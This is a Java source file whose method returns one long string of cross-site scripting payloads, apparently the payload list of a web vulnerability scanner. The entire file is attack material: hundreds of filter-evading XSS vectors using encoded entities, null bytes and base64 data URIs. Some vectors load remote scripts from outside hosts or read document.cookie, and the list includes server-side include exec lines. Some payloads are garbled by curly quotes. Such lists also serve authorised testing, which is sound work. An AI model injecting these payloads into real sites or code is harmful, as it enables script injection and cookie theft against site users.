/*
 * To change this license header, choose License Headers in Project Properties.
 * To change this template file, choose Tools | Templates
 * and open the template in the editor.
 */
package payload;

import java.util.ArrayList;

/**
 *
 * @author Shaco JX
 */
public class A3p_1 {

    public ArrayList<String> XSS() {
        ArrayList<String> list = new ArrayList<>();
        String payload = "<script>alert(123);</script>\n"
                + "<ScRipT>alert(\"XSS\");</ScRipT>\n"
                + "<script>alert(123)</script>\n"
                + "<script>alert(\"hellox worldss\");</script>\n"
                + "<script>alert(“XSS”)</script> \n"
                + "<script>alert(“XSS”);</script>\n"
                + "<script>alert(‘XSS’)</script>\n"
                + "“><script>alert(“XSS”)</script>\n"
                + "<script>alert(/XSS”)</script>\n"
                + "<script>alert(/XSS/)</script>\n"
                + "</script><script>alert(1)</script>\n"
                + "‘; alert(1);\n"
                + "‘)alert(1);//\n"
                + "alert(1)\n"
                + "<ScRiPt>alert(1)</sCriPt>\n"
                + "<IMG SRC=jAVasCrIPt:alert(‘XSS’)>\n"
                + "<IMG SRC=”javascript:alert(‘XSS’);”>\n"
                + "<IMG SRC=javascript:alert(&quot;XSS&quot;)>\n"
                + "<IMG SRC=javascript:alert(‘XSS’)>      \n"
                + "<img src=xss onerror=alert(1)>\n"
                + "\n"
                + "\n"
                + "<iframe %00 src=\"&Tab;javascript:prompt(1)&Tab;\"%00>\n"
                + "\n"
                + "<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>'\n"
                + "\n"
                + "<input/onmouseover=\"javaSCRIPT&colon;confirm&lpar;1&rpar;\"\n"
                + "\n"
                + "<sVg><scRipt %00>alert&lpar;1&rpar; {Opera}\n"
                + "\n"
                + "<img/src=`%00` onerror=this.onerror=confirm(1)\n"
                + "\n"
                + "<form><isindex formaction=\"javascript&colon;confirm(1)\"\n"
                + "\n"
                + "<img src=`%00`&NewLine; onerror=alert(1)&NewLine;\n"
                + "\n"
                + "<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script>\n"
                + "\n"
                + "<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?\n"
                + "\n"
                + "<iframe/src=\"data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==\">\n"
                + "\n"
                + "<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/\n"
                + "\n"
                + "&#34;&#62;<h1/onmouseover='\\u0061lert(1)'>%00\n"
                + "\n"
                + "<iframe/src=\"data:text/html,<svg &#111;&#110;load=alert(1)>\">\n"
                + "\n"
                + "<meta content=\"&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)\" http-equiv=\"refresh\"/>\n"
                + "\n"
                + "<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script\n"
                + "\n"
                + "<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}\n"
                + "\n"
                + "<meta http-equiv=\"refresh\" content=\"0;url=javascript:confirm(1)\">\n"
                + "<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;>\n"
                + "\n"
                + "<form><a href=\"javascript:\\u0061lert&#x28;1&#x29;\">X\n"
                + "\n"
                + "</script><img/*%00/src=\"worksinchrome&colon;prompt&#x28;1&#x29;\"/%00*/onerror='eval(src)'>\n"
                + "<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)>\n"
                + "<form><iframe &#09;&#10;&#11; src=\"javascript&#58;alert(1)\"&#11;&#10;&#09;;>\n"
                + "\n"
                + "<a href=\"data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==\"&#09;&#10;&#11;>X</a\n"
                + "\n"
                + "http://www.google<script .com>alert(document.location)</script\n"
                + "\n"
                + "<a&#32;href&#61;&#91;&#00;&#93;\"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;\">XYZ</a\n"
                + "\n"
                + "<img/src=@&#32;&#13; onerror = prompt('&#49;')\n"
                + "\n"
                + "<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41;\n"
                + "\n"
                + "<script ^__^>alert(String.fromCharCode(49))</script ^__^\n"
                + "\n"
                + "</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-(\n"
                + "\n"
                + "&#00;</form><input type&#61;\"date\" onfocus=\"alert(1)\">\n"
                + "\n"
                + "<form><textarea &#13; onkeyup='\\u0061\\u006C\\u0065\\u0072\\u0074&#x28;1&#x29;'>\n"
                + "\n"
                + "<script /***/>/***/confirm('\\uFF41\\uFF4C\\uFF45\\uFF52\\uFF54\\u1455\\uFF11\\u1450')/***/</script /***/\n"
                + "\n"
                + "<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'>\n"
                + "\n"
                + "<a href=\"javascript:void(0)\" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a>\n"
                + "\n"
                + "<script ~~~>alert(0%0)</script ~~~>\n"
                + "\n"
                + "<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;>\n"
                + "\n"
                + "<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN\n"
                + "\n"
                + "<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1)\n"
                + "\n"
                + "&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>'\n"
                + "\n"
                + "&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera}\n"
                + "\n"
                + "<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^\n"
                + "\n"
                + "<div/style=\"width:expression(confirm(1))\">X</div> {IE7}\n"
                + "\n"
                + "<iframe/%00/ src=javaSCRIPT&colon;alert(1)\n"
                + "\n"
                + "//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>//\n"
                + "\n"
                + "/*iframe/src*/<iframe/src=\"<iframe/src=@\"/onload=prompt(1) /*iframe/src*/>\n"
                + "\n"
                + "//|\\\\ <script //|\\\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\\\ </script //|\\\\\n"
                + "\n"
                + "</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style>\n"
                + "\n"
                + "<a/href=\"javascript:&#13; javascript:prompt(1)\"><input type=\"X\">\n"
                + "\n"
                + "</plaintext\\></|\\><plaintext/onmouseover=prompt(1)\n"
                + "\n"
                + "</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera}\n"
                + "\n"
                + "<a href=\"javascript&colon;\\u0061&#x6C;&#101%72t&lpar;1&rpar;\"><button>\n"
                + "\n"
                + "<div onmouseover='alert&lpar;1&rpar;'>DIV</div>\n"
                + "\n"
                + "<iframe style=\"xg-p:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\">\n"
                + "\n"
                + "<a href=\"jAvAsCrIpT&colon;alert&lpar;1&rpar;\">X</a>\n"
                + "\n"
                + "<embed src=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">\n"
                + "\n"
                + "<object data=\"http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf\">\n"
                + "\n"
                + "<var onmouseover=\"prompt(1)\">On Mouse Over</var>\n"
                + "\n"
                + "<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a>\n"
                + "\n"
                + "<img src=\"/\" =_=\" title=\"onerror='prompt(1)'\">\n"
                + "\n"
                + "<%<!--'%><script>alert(1);</script -->\n"
                + "\n"
                + "<script src=\"data:text/javascript,alert(1)\"></script>\n"
                + "<iframe/src \\/\\/onload = prompt(1)\n"
                + "\n"
                + "<iframe/onreadystatechange=alert(1)\n"
                + "\n"
                + "<svg/onload=alert(1)\n"
                + "\n"
                + "<input value=<><iframe/src=javascript:confirm(1)\n"
                + "\n"
                + "<input type=\"text\" value=`` <div/onmouseover='alert(1)'>X</div>\n"
                + "\n"
                + "http://www.<script>alert(1)</script .com\n"
                + "\n"
                + "<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe>\n"
                + "\n"
                + "<svg><script ?>alert(1)\n"
                + "\n"
                + "<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>\n"
                + "\n"
                + "<img src=`xx:xx`onerror=alert(1)>\n"
                + "\n"
                + "<meta http-equiv=\"refresh\" content=\"0;javascript&colon;alert(1)\"/>\n"
                + "<math><a xlink:href=\"//jsfiddle.net/t846h/\">click\n"
                + "\n"
                + "<embed code=\"http://businessinfo.co.uk/labs/xss/xss.swf\" allowscriptaccess=always>\n"
                + "<svg contentScriptType=text/vbs><script>MsgBox+1\n"
                + "\n"
                + "<a href=\"data:text/html;base64_,<svg/onload=\\u0061&#x6C;&#101%72t(1)>\">X</a\n"
                + "\n"
                + "<iframe/onreadystatechange=\\u0061\\u006C\\u0065\\u0072\\u0074('\\u0061') worksinIE>\n"
                + "\n"
                + "<script>~'\\u0061' ; \\u0074\\u0068\\u0072\\u006F\\u0077 ~ \\u0074\\u0068\\u0069\\u0073. \\u0061\\u006C\\u0065\\u0072\\u0074(~'\\u0061')</script U+\n"
                + "\n"
                + "<script/src=\"data&colon;text%2Fj\\u0061v\\u0061script,\\u0061lert('\\u0061')\"></script a=\\u0061 & /=%2F\n"
                + "<script/src=data&colon;text/j\\u0061v\\u0061&#115&#99&#114&#105&#112&#116,\\u0061%6C%65%72%74(/XSS/)></script\n"
                + "\n"
                + "<object data=javascript&colon;\\u0061&#x6C;&#101%72t(1)>\n"
                + "\n"
                + "<script>+-+-1-+-+alert(1)</script>\n"
                + "\n"
                + "<body/onload=&lt;!--&gt;&#10alert(1)>\n"
                + "\n"
                + "<script itworksinallbrowsers>/*<script* */alert(1)</script\n"
                + "\n"
                + "<img src ?itworksonchrome?\\/onerror = alert(1)\n"
                + "\n"
                + "<svg><script>//&NewLine;confirm(1);</script </svg>\n"
                + "<svg><script onlypossibleinopera:-)> alert(1)\n"
                + "\n"
                + "<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe\n"
                + "\n"
                + "<script x> alert(1) </script 1=2\n"
                + "\n"
                + "<div/onmouseover='alert(1)'> style=\"x:\">\n"
                + "\n"
                + "<--`<img/src=` onerror=alert(1)> --!>\n"
                + " <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>\n"
                + "\n"
                + "<div style=\"xg-p:absolute;top:0;left:0;width:100%;height:100%\" onmouseover=\"prompt(1)\" onclick=\"alert(1)\">x</button>\n"
                + "\n"
                + "\"><img src=x onerror=window.open('https://www.google.com/');>\n"
                + "\n"
                + "<form><button formaction=javascript&colon;alert(1)>CLICKME\n"
                + "\n"
                + "<math><a xlink:href=\"//jsfiddle.net/t846h/\">click\n"
                + "\n"
                + "<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>\n"
                + "\n"
                + "<iframe src=\"data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E\"></iframe>\n"
                + "\n"
                + "<a href=\"data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203\">Click Me</a>\n"
                + "\n"
                + "<SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>\n"
                + "‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\n"
                + "<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>\n"
                + "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>\n"
                + "<IMG SRC=”jav ascript:alert(‘XSS’);”>\n"
                + "<IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”>\n"
                + "<<SCRIPT>alert(“XSS”);//<</SCRIPT>\n"
                + "%253cscript%253ealert(1)%253c/script%253e\n"
                + "“><s”%2b”cript>alert(document.cookie)</script>\n"
                + "foo<script>alert(1)</script>\n"
                + "<scr<script>ipt>alert(1)</scr</script>ipt>\n"
                + "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>\n"
                + "<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>\n"
                + "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>\n"
                + "<BODY BACKGROUND=”javascript:alert(‘XSS’)”>\n"
                + "<BODY ONLOAD=alert(‘XSS’)>\n"
                + "<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>\n"
                + "<IMG SRC=”javascript:alert(‘XSS’)”\n"
                + "<iframe src=http://ha.ckers.org/scriptlet.html <\n"
                + "javascript:alert(\"hellox worldss\")\n"
                + "<img src=\"javascript:alert('XSS');\">\n"
                + "<img src=javascript:alert(&quot;XSS&quot;)>\n"
                + "<\"';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\n"
                + "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">\n"
                + "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\n"
                + "<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>\n"
                + "<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>\n"
                + "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>\n"
                + "<\"';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\n"
                + "';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search\n"
                + "<script>alert(\"hellox worldss\")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510\n"
                + "<script>alert(\"XSS\");</script>&search=1\n"
                + "0&q=';alert(String.fromCharCode(88,83,83))//\\';alert%2?8String.fromCharCode(88,83,83))//\";alert(String.fromCharCode?(88,83,83))//\\\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search\n"
                + "<h1><font color=blue>hellox worldss</h1>\n"
                + "<BODY ONLOAD=alert('hellox worldss')>\n"
                + "<input onfocus=write(XSS) autofocus>\n"
                + "<input onblur=write(XSS) autofocus><input autofocus>\n"
                + "<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>\n"
                + "<form><button formaction=\"javascript:alert(XSS)\">lol\n"
                + "<!--<img src=\"--><img src=x onerror=alert(XSS)//\">\n"
                + "<![><img src=\"]><img src=x onerror=alert(XSS)//\">\n"
                + "<style><img src=\"</style><img src=x onerror=alert(XSS)//\">\n"
                + "<? foo=\"><script>alert(1)</script>\">\n"
                + "<! foo=\"><script>alert(1)</script>\">\n"
                + "</ foo=\"><script>alert(1)</script>\">\n"
                + "<? foo=\"><x foo='?><script>alert(1)</script>'>\">\n"
                + "<! foo=\"[[[Inception]]\"><x foo=\"]foo><script>alert(1)</script>\">\n"
                + "<% foo><x foo=\"%><script>alert(123)</script>\">\n"
                + "<div style=\"font-family:'foo&#10;;color:red;';\">LOL\n"
                + "LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>\n"
                + "<script>({0:#0=alert/#0#/#0#(0)})</script>\n"
                + "<svg xmlns=\"http://www.w3.org/2000/svg\">LOL<script>alert(123)</script></svg>\n"
                + "&lt;SCRIPT&gt;alert(/XSS/&#46;source)&lt;/SCRIPT&gt;\n"
                + "\\\\\";alert('XSS');//\n"
                + "&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(\\\"XSS\\\");&lt;/SCRIPT&gt;\n"
                + "&lt;INPUT TYPE=\\\"IMAGE\\\" SRC=\\\"javascript&#058;alert('XSS');\\\"&gt;\n"
                + "&lt;BODY BACKGROUND=\\\"javascript&#058;alert('XSS')\\\"&gt;\n"
                + "&lt;BODY ONLOAD=alert('XSS')&gt;\n"
                + "&lt;IMG DYNSRC=\\\"javascript&#058;alert('XSS')\\\"&gt;\n"
                + "&lt;IMG LOWSRC=\\\"javascript&#058;alert('XSS')\\\"&gt;\n"
                + "&lt;BGSOUND SRC=\\\"javascript&#058;alert('XSS');\\\"&gt;\n"
                + "&lt;BR SIZE=\\\"&{alert('XSS')}\\\"&gt;\n"
                + "&lt;LAYER SRC=\\\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\\\"&gt;&lt;/LAYER&gt;\n"
                + "&lt;LINK REL=\\\"stylesheet\\\" HREF=\\\"javascript&#058;alert('XSS');\\\"&gt;\n"
                + "&lt;LINK REL=\\\"stylesheet\\\" HREF=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;css\\\"&gt;\n"
                + "&lt;STYLE&gt;@import'http&#58;//ha&#46;ckers&#46;org/xss&#46;css';&lt;/STYLE&gt;\n"
                + "&lt;META HTTP-EQUIV=\\\"Link\\\" Content=\\\"&lt;http&#58;//ha&#46;ckers&#46;org/xss&#46;css&gt;; REL=stylesheet\\\"&gt;\n"
                + "&lt;STYLE&gt;BODY{-moz-binding&#58;url(\\\"http&#58;//ha&#46;ckers&#46;org/xssmoz&#46;xml#xss\\\")}&lt;/STYLE&gt;\n"
                + "&lt;XSS STYLE=\\\"behavior&#58; url(xss&#46;htc);\\\"&gt;\n"
                + "&lt;STYLE&gt;li {list-style-image&#58; url(\\\"javascript&#058;alert('XSS')\\\");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS\n"
                + "&lt;IMG SRC='vbscript&#058;msgbox(\\\"XSS\\\")'&gt;\n"
                + "&lt;IMG SRC=\\\"mocha&#58;&#91;code&#93;\\\"&gt;\n"
                + "&lt;IMG SRC=\\\"livescript&#058;&#91;code&#93;\\\"&gt;\n"
                + "žscriptualert(EXSSE)ž/scriptu\n"
                + "&lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=javascript&#058;alert('XSS');\\\"&gt;\n"
                + "&lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0;url=data&#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\"&gt;\n"
                + "&lt;META HTTP-EQUIV=\\\"refresh\\\" CONTENT=\\\"0; URL=http&#58;//;URL=javascript&#058;alert('XSS');\\\"\n"
                + "&lt;IFRAME SRC=\\\"javascript&#058;alert('XSS');\\\"&gt;&lt;/IFRAME&gt;\n"
                + "&lt;FRAMESET&gt;&lt;FRAME SRC=\\\"javascript&#058;alert('XSS');\\\"&gt;&lt;/FRAMESET&gt;\n"
                + "&lt;TABLE BACKGROUND=\\\"javascript&#058;alert('XSS')\\\"&gt;\n"
                + "&lt;TABLE&gt;&lt;TD BACKGROUND=\\\"javascript&#058;alert('XSS')\\\"&gt;\n"
                + "&lt;DIV STYLE=\\\"background-image&#58; url(javascript&#058;alert('XSS'))\\\"&gt;\n"
                + "&lt;DIV STYLE=\\\"background-image&#58;\\0075\\0072\\006C\\0028'\\006a\\0061\\0076\\0061\\0073\\0063\\0072\\0069\\0070\\0074\\003a\\0061\\006c\\0065\\0072\\0074\\0028&#46;1027\\0058&#46;1053\\0053\\0027\\0029'\\0029\\\"&gt;\n"
                + "&lt;DIV STYLE=\\\"background-image&#58; url(javascript&#058;alert('XSS'))\\\"&gt;\n"
                + "&lt;DIV STYLE=\\\"width&#58; expression(alert('XSS'));\\\"&gt;\n"
                + "&lt;STYLE&gt;@im\\port'\\ja\\vasc\\ript&#58;alert(\\\"XSS\\\")';&lt;/STYLE&gt;\n"
                + "&lt;IMG STYLE=\\\"xss&#58;expr/*XSS*/ession(alert('XSS'))\\\"&gt;\n"
                + "&lt;XSS STYLE=\\\"xss&#58;expression(alert('XSS'))\\\"&gt;\n"
                + "exp/*&lt;A STYLE='no\\xss&#58;noxss(\\\"*//*\\\");\n"
                + "xss&#58;ex&#x2F;*XSS*//*/*/pression(alert(\\\"XSS\\\"))'&gt;\n"
                + "&lt;STYLE TYPE=\\\"text/javascript\\\"&gt;alert('XSS');&lt;/STYLE&gt;\n"
                + "&lt;STYLE&gt;&#46;XSS{background-image&#58;url(\\\"javascript&#058;alert('XSS')\\\");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;\n"
                + "&lt;STYLE type=\\\"text/css\\\"&gt;BODY{background&#58;url(\\\"javascript&#058;alert('XSS')\\\")}&lt;/STYLE&gt;\n"
                + "&lt;!--&#91;if gte IE 4&#93;&gt;\n"
                + "&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;\n"
                + "&lt;!&#91;endif&#93;--&gt;\n"
                + "&lt;BASE HREF=\\\"javascript&#058;alert('XSS');//\\\"&gt;\n"
                + "&lt;OBJECT TYPE=\\\"text/x-scriptlet\\\" DATA=\\\"http&#58;//ha&#46;ckers&#46;org/scriptlet&#46;html\\\"&gt;&lt;/OBJECT&gt;\n"
                + "&lt;OBJECT classid=clsid&#58;ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript&#058;alert('XSS')&gt;&lt;/OBJECT&gt;\n"
                + "&lt;EMBED SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;swf\\\" AllowScriptAccess=\\\"always\\\"&gt;&lt;/EMBED&gt;\n"
                + "&lt;EMBED SRC=\\\"data&#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\" type=\\\"image/svg+xml\\\" AllowScriptAccess=\\\"always\\\"&gt;&lt;/EMBED&gt;\n"
                + "a=\\\"get\\\";\n"
                + "b=\\\"URL(\\\\\"\\\";\n"
                + "c=\\\"javascript&#058;\\\";\n"
                + "d=\\\"alert('XSS');\\\\\")\\\";\n"
                + "eval(a+b+c+d);\n"
                + "&lt;HTML xmlns&#58;xss&gt;&lt;?import namespace=\\\"xss\\\" implementation=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;htc\\\"&gt;&lt;xss&#58;xss&gt;XSS&lt;/xss&#58;xss&gt;&lt;/HTML&gt;\n"
                + "&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;!&#91;CDATA&#91;&lt;IMG SRC=\\\"javas&#93;&#93;&gt;&lt;!&#91;CDATA&#91;cript&#58;alert('XSS');\\\"&gt;&#93;&#93;&gt;\n"
                + "&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;\n"
                + "&lt;XML ID=\\\"xss\\\"&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=\\\"javas&lt;!-- --&gt;cript&#58;alert('XSS')\\\"&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;\n"
                + "&lt;SPAN DATASRC=\\\"#xss\\\" DATAFLD=\\\"B\\\" DATAFORMATAS=\\\"HTML\\\"&gt;&lt;/SPAN&gt;\n"
                + "&lt;XML SRC=\\\"xsstest&#46;xml\\\" ID=I&gt;&lt;/XML&gt;\n"
                + "&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;\n"
                + "&lt;HTML&gt;&lt;BODY&gt;\n"
                + "&lt;?xml&#58;namespace prefix=\\\"t\\\" ns=\\\"urn&#58;schemas-microsoft-com&#58;time\\\"&gt;\n"
                + "&lt;?import namespace=\\\"t\\\" implementation=\\\"#default#time2\\\"&gt;\n"
                + "&lt;t&#58;set attributeName=\\\"innerHTML\\\" to=\\\"XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;\\\"&gt;\n"
                + "&lt;/BODY&gt;&lt;/HTML&gt;\n"
                + "&lt;SCRIPT SRC=\\\"http&#58;//ha&#46;ckers&#46;org/xss&#46;jpg\\\"&gt;&lt;/SCRIPT&gt;\n"
                + "&lt;!--#exec cmd=\\\"/bin/echo '&lt;SCR'\\\"--&gt;&lt;!--#exec cmd=\\\"/bin/echo 'IPT SRC=http&#58;//ha&#46;ckers&#46;org/xss&#46;js&gt;&lt;/SCRIPT&gt;'\\\"--&gt;\n"
                + "&lt;? echo('&lt;SCR)';\n"
                + "echo('IPT&gt;alert(\\\"XSS\\\")&lt;/SCRIPT&gt;'); ?&gt;\n"
